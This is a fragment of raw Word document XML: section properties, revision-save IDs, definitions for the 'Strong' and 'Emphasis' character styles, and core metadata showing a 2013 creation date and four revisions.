      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D15BFB" w:rsidRPr="008C0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310"/>
    <w:rsid w:val="001F3310"/>
    <w:rsid w:val="002769D0"/>
    <w:rsid w:val="008C0FB2"/>
    <w:rsid w:val="00D15BFB"/>
    <w:rsid w:val="00D15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D91AB-D614-4306-8D1C-16265712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9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69D0"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="002769D0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="002769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01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Khau</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dao Khau</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-18T01:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-18T01:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>